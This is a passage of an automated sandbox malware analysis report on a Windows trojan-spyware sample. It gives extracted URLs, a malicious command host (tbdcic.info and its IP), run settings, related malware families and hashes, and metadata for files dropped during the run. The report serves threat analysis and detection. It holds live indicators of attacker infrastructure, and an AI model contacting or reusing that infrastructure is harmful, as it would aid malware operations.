                                  http://www.uvnc.comOlz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                    high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D.13.drfalse
                                      high
                                      http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                        high
                                        http://www.uvnc.comopenhttp://forum.uvnc.comnetOlz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                          unknown
                                          http://crl.thawte.com/ThawteTimestampingCA.crl0Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                            high
                                            http://java.sun.com/products/plugin/index.html#downloadOlz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                              high
                                              http://forum.uvnc.comOlz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                                unknown
                                                http://ocsp.thawte.com0Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  194.190.152.201
                                                  tbdcic.infoRussian Federation
                                                  41615RSHB-ASRUtrue
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579877
                                                  Start date and time:2024-12-23 13:28:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 16s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:39
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:Olz7TmvkEW.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
                                                  Detection:MAL
                                                  Classification:mal84.troj.spyw.evad.winEXE@50/46@2/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 23.195.39.65, 2.19.198.27, 23.32.239.56, 23.32.239.9, 13.107.246.63, 20.190.177.22, 23.218.208.109, 18.213.11.84, 20.199.58.43, 23.41.168.139, 172.202.163.200, 2.16.158.48, 150.171.27.10, 2.16.158.58
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, a122.dscd.akamai.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, geo2.adobe.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: Olz7TmvkEW.exe
                                                  TimeTypeDescription
                                                  07:29:23API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                  07:29:56API Interceptor3073213x Sleep call for process: sync_browser.exe modified
                                                  07:30:08API Interceptor65x Sleep call for process: timeout.exe modified
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ax-0001.ax-msedge.netArchivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                  • 150.171.28.10
                                                  BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                  • 150.171.28.10
                                                  613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                  • 150.171.28.10
                                                  r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 150.171.28.10
                                                  vRWw6y4Pj2.exeGet hashmaliciousUnknownBrowse
                                                  • 150.171.27.10
                                                  2E814B7D-3F0B-4AF7-8C7C-C8AE7CD57525_12172024125634383.dllGet hashmaliciousUnknownBrowse
                                                  • 150.171.28.10
                                                  fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 150.171.27.10
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                  • 150.171.28.10
                                                  uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                  • 150.171.27.10
                                                  BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                  • 150.171.28.10
                                                  bg.microsoft.map.fastly.neteszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                  • 199.232.210.172
                                                  0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                  • 199.232.210.172
                                                  #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                  • 199.232.214.172
                                                  fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                  • 199.232.210.172
                                                  5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                  • 199.232.210.172
                                                  p3a0oZ4U7X.exeGet hashmaliciousUnknownBrowse
                                                  • 199.232.214.172
                                                  lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                  • 199.232.210.172
                                                  fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 199.232.214.172
                                                  #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                  • 199.232.210.172
                                                  Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 199.232.214.172
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  RSHB-ASRUScan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                  • 194.190.152.129
                                                  Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                  • 194.190.152.129
                                                  document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                  • 194.190.152.129
                                                  tiago.exeGet hashmaliciousReverse SSHBrowse
                                                  • 194.190.152.129
                                                  0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                  • 194.190.152.148
                                                  Paralysis Hack.exeGet hashmaliciouszgRATBrowse
                                                  • 194.190.153.137
                                                  file.exeGet hashmalicious000StealerBrowse
                                                  • 194.190.152.193
                                                  EgNIXduB6T.exeGet hashmaliciousErbium StealerBrowse
                                                  • 194.190.152.194
                                                  2MNB4UhUqR.exeGet hashmaliciousRedLineBrowse
                                                  • 194.190.152.20
                                                  w9d568i4Ia.exeGet hashmaliciousDCRatBrowse
                                                  • 194.190.152.128
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:modified
                                                  Size (bytes):475
                                                  Entropy (8bit):4.971824627296864
                                                  Encrypted:false
                                                  SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                  MD5:F326539D084B03D88254A74D6018F692
                                                  SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                  SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                  SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                  Malicious:false
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):475
                                                  Entropy (8bit):4.971824627296864
                                                  Encrypted:false
                                                  SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                  MD5:F326539D084B03D88254A74D6018F692
                                                  SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                  SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                  SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                  Malicious:false
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):66934
                                                  Entropy (8bit):2.436424201832609
                                                  Encrypted:false
                                                  SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                  MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                  SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                  SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                  SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                  Malicious:false
                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                  Category:dropped
                                                  Size (bytes):86016
                                                  Entropy (8bit):4.444859185243817
                                                  Encrypted:false
                                                  SSDEEP:384:ye6ci5thiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mys3OazzU89UTTgUL
                                                  MD5:8F840CF93CFA33F75DB904BD3EAB01DE
                                                  SHA1:87BDAA6B51E6B11D00C9415DB74CAA2403D4DD98
                                                  SHA-256:293A514532FC9FFFCD8A5C3E2445AD7BAA3F85C2606C96EDC2C85DAA1D7EAFFA
                                                  SHA-512:4CA9C6DD6AA27C25AC2413840905AFD197F57A9E49FE12D22D22B66D943FDD77CDF581BA01E187B5AE302A52092936332D6B7288020407912EEF3A2CCE591AD3
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):8720
                                                  Entropy (8bit):3.7683978792074293
                                                  Encrypted:false
                                                  SSDEEP:48:7MkJioyViYioyftoy1C7oy16oy1pxKOioy1noy1AYoy1Wioy1oioykioyBoy1noP:73JuJviXjBiRb9IVXEBodRBkC
                                                  MD5:E4ABB1988E44EC3BC0CE5079F528E030
                                                  SHA1:2A68DC1A1D1BC3A19163C950876967917957A8F1
                                                  SHA-256:EB0D2B16DB85923B0106279E2BEE26F6A6C2CD21B245BF5265DE2B4251A6C457
                                                  SHA-512:EB245B745478CCA3F96326E5F07C4E2FFE2C045C26B3BD2E2DCCA503F94CCA0C2477847AC97C88EFE8D64503BA2F481F9351D61342C65FE55AE713F6FCC24B27
                                                  Malicious:false
                                                  Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Certificate, Version=3
                                                  Category:dropped
                                                  Size (bytes):1391
                                                  Entropy (8bit):7.705940075877404
                                                  Encrypted:false
                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                  Malicious:false
                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):192
                                                  Entropy (8bit):2.7381013623686155
                                                  Encrypted:false
                                                  SSDEEP:3:kkFklOtl1fllXlE/HT8ksXzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKXX2T8/NMa8RdWBwRd
                                                  MD5:5C149C7457CD81BE43556F2622233BF1
                                                  SHA1:6643C13BDE8D901CD60197AC5498BDE1EB21C8D3
                                                  SHA-256:FC2D95504DB7C6C1F7E8CC49771074002FD525A4063D6B428C9EFDDEB597819F
                                                  SHA-512:2B8FE3AE99D9FA5DA6E32ADFD08692658D99DD7A636D0BB3C96944C324211DDE28CC6E0CDB17CCA15DF87E4EDA3D300985B896362844318AD42543B43C6F8AA1
                                                  Malicious:false
                                                  Preview:p...... ........}.WL6U..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):295
                                                  Entropy (8bit):5.351310406990786
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJM3g98kUwPeUkwRe9:YvXKXbOlpSGcDicXYGMbLUkee9
                                                  MD5:4BC212132E7D4606B0CD715BCC4B4140
                                                  SHA1:B88301E1CD01FF140C0FB0283E45B4D7BF8513FB
                                                  SHA-256:322D9E20595152349B6B2D6FF9F76916DA554EB3D07CE0BCFD65CDD7C628D6A4
                                                  SHA-512:BB53DA67EFE5EA7EDFC3F44E2E386956A71429637B7D8100A8031163945C6942BB7628903D15E641B7CF97874F58E6BA9D5EC4E29032396B3358AF1C75727BC4
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):294
                                                  Entropy (8bit):5.301803258609371
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfBoTfXpnrPeUkwRe9:YvXKXbOlpSGcDicXYGWTfXcUkee9
                                                  MD5:95D3B6A8C98F9E24D9A17A2ECEB4BE52
                                                  SHA1:D105D0F2F1C7CE682F3AAA29BEB8CD40C085DB9B
                                                  SHA-256:0EFDA2D9EEB4824F19F26EDA330E482A8A44962A7D723D336472183D4A460EB9
                                                  SHA-512:50352EF4F9597A2E56230B79C6F21C8AAD97F5C6E63CBA507EC4C9D476CDEFC00CDBBD8279A4A2568680F247BE5CE2A5C979D3C328CEB4E5304C0D71E5A5B9C7
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):294
                                                  Entropy (8bit):5.280624333654969
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfBD2G6UpnrPeUkwRe9:YvXKXbOlpSGcDicXYGR22cUkee9
                                                  MD5:103A81507560B18DD3FB49240661342E
                                                  SHA1:B610E833C1A62AA6DC9F836CF4DF5D168287FB2B
                                                  SHA-256:AE86F5DDB2A73B10F21897C99551FB5A924BE0A07DDB2CD644504EA37BAC4E4A
                                                  SHA-512:0AF1AAB390A90F0813EA062D49F80D07A6FBB9D96599362ADD46AED7659C27B3D7213E561707B8245994E2F65391D4844924D61F12F24F551ADBEDE2B9E60B72
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):285
                                                  Entropy (8bit):5.330910071099409
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfPmwrPeUkwRe9:YvXKXbOlpSGcDicXYGH56Ukee9
                                                  MD5:02C62B39EBE948CE5F67B8D47242C63D
                                                  SHA1:093EF78E76C5F9F88E56CD679AB1F2981B94AB4C
                                                  SHA-256:4CA9EF0448AA05815BCFB3D33A949CEA5DAD13B64024C24E233C280C402565FC
                                                  SHA-512:5006BD24A1005316181BCC6F58D7E8787EB71FEBBA0E99597B18DA0ACAFB595051B2940BCEDB64D716E004EAEAFCCAAFF19D514E0B8F8496E49D38A6F129E0B2
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1123
                                                  Entropy (8bit):5.6831892511679
                                                  Encrypted:false
                                                  SSDEEP:24:Yv6XCl47+cX1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSSY:Yvt+X1hgy6SAFv5Ah8cv/SY
                                                  MD5:81F86A83B6D6656B4956FE41528CA98D
                                                  SHA1:EDAB7917CF5F261375FCFE20680F876EF6165FFF
                                                  SHA-256:EEC5D0EE6876FF8419C220108E61D8A5E13D8AEC1D44B1DBC9235A4570089E72
                                                  SHA-512:6FF279045EDF4A0F8D884B23B195E0D1E53B755558549CEE84206BFEAEABC8B85400CB3E3D4C70A59C5378E47738E96DFF4F4BAB4A759570149452E77718161B
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.27729979570658
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf8dPeUkwRe9:YvXKXbOlpSGcDicXYGU8Ukee9
                                                  MD5:BA164A25AFAC73C5511D02A0D4E0C59B
                                                  SHA1:5CEF22FD8C29CA784899E50D368B92005B059AC1
                                                  SHA-256:A0D11F4254BF0AFAF77D7B496641CABAACFFE647BF331712CF493CD5F895472F
                                                  SHA-512:1933666BF1AA9D7C2B03A7F933D55910AAE62530B6259E4546275993DC5ED663E64AA8108EA2A1F3185A0B87EF7C8942D48B4EA359424B892CE808164B5663E9
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):5.279910642397763
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfQ1rPeUkwRe9:YvXKXbOlpSGcDicXYGY16Ukee9
                                                  MD5:3407C8503EBFAF3791880606C57121BB
                                                  SHA1:604A7CA4392FC204F337068F75323067C694FB6D
